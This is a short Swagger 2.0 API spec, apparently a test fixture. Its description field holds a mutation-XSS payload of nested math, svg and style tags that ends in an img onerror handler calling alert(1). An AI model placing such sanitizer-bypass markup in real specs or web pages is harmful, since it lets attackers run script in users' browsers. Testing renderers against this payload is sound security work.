swagger: '2.0'
info:
  title: XSS test for Swagger
  description: |
        <math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><style><a title=\"</style><img src onerror='alert(1)'>\"></style></h1>
paths:
  /test:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - test
      operationId: findtest
      summary: Finds all tests
